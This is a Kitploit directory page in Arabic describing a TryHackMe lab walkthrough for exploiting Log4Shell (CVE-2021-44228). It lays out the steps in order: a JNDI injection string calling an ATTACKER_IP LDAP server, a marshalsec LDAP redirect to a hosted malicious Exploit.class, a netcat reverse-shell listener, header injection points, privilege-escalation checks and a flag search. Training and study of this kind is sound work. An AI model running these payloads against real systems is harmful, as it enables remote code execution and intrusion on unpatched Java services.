Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Solar-exploiting-log-4j — دليل خطوة بخطوة من TryHackMe لاستغلال ثغرة Log4Shell (CVE-2021-44228) لتحقيق تنفيذ التعليمات البرمجية عن بُعد والتقاط الأعلام. | Kitploit
أدوات/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالالهندسة العكسيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

دليل خطوة بخطوة من TryHackMe لاستغلال ثغرة Log4Shell (CVE-2021-44228) لتحقيق تنفيذ التعليمات البرمجية عن بُعد والتقاط الأعلام.

عرض المستودع
211منذ 5 أشهرلم تتم المراجعة بعد

🔥 Solar Exploiting Log4j - دليل TryHackMe

📌 الغرفة: Solar Exploiting Log4j

المنصة: TryHackMe الصعوبة: متوسطة الموضوع: Log4Shell (ثغرة Log4j)


🧠 الهدف

استغلال ثغرة Log4j (CVE-2021-44228) لتحقيق تنفيذ الأوامر عن بُعد والتقاط الأعلام.


🛠️ الأدوات المستخدمة

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 الخطوة 1: الاستطلاع

🔍 فحص الهدف

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 النتائج

  • المنافذ المفتوحة: 80 (HTTP)، ومنافذ أخرى حسب الغرفة
  • تطبيق ويب يعمل بواجهة خلفية مبنية بـ Java

🌐 الخطوة 2: تعداد الويب

  • زيارة تطبيق الويب في المتصفح
  • التفاعل مع حقول الإدخال (تسجيل الدخول/البحث/حقول الترويسة)
  • التقاط الطلب باستخدام Burp Suite

💥 الخطوة 3: تحديد ثغرة Log4j

تسمح ثغرة Log4j بحقن JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

إذا تم تسجيل الإدخال → فهذا يعني وجود الثغرة.


⚙️ الخطوة 4: إعداد المستمع

تشغيل Netcat

root@kitploit:~
nc -lvnp 4444

تشغيل خادم LDAP خبيث (مثال)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

شغّل خادم LDAP:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 الخطوة 5: استضافة الحمولة

root@kitploit:~
python3 -m http.server 8000

أنشئ كلاس Java خبيث (Exploit.class)


🚀 الخطوة 6: تشغيل الاستغلال

احقن الحمولة في الحقل القابل للاستغلال:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 استخدم ترويسات مثل:

  • User-Agent
  • X-Api-Version

🖥️ الخطوة 7: الحصول على قشرة عكسية

بمجرد التشغيل:

  • يتصل الهدف مرة أخرى بمستمع Netcat
  • تحصل على وصول إلى القشرة (Shell)

🔐 الخطوة 8: تصعيد الصلاحيات (إذا لزم الأمر)

تحقق:

root@kitploit:~
sudo -l

ابحث عن:

  • ملفات SUID الثنائية المضبوطة بشكل خاطئ
  • الملفات القابلة للكتابة
  • مهام Cron

🚩 الخطوة 9: التقاط الأعلام

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 المفاهيم الأساسية المستفادة

  • Log4Shell (CVE-2021-44228)
  • حقن JNDI
  • تنفيذ الأوامر عن بُعد (RCE)
  • القشرة العكسية (Reverse Shell)
  • استغلال الويب
تنزيل الأداة